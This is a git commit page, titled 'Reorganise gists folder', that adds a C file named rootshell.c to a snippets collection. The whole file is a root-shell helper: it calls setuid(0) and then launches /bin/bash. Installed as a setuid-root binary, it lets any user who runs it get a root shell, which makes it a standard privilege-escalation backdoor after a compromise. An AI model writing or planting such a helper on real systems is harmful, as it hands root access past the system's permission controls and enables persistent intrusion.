Reorganise gists folder
This commit is contained in:
11
codegrab/rootshell.c
Normal file
11
codegrab/rootshell.c
Normal file
@@ -0,0 +1,11 @@
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <sys/types.h>
|
||||
#include <unistd.h>
|
||||
|
||||
int main()
|
||||
{
|
||||
setuid(0);
|
||||
system("/bin/bash");
|
||||
return 0;
|
||||
}
|
||||
Reference in New Issue
Block a user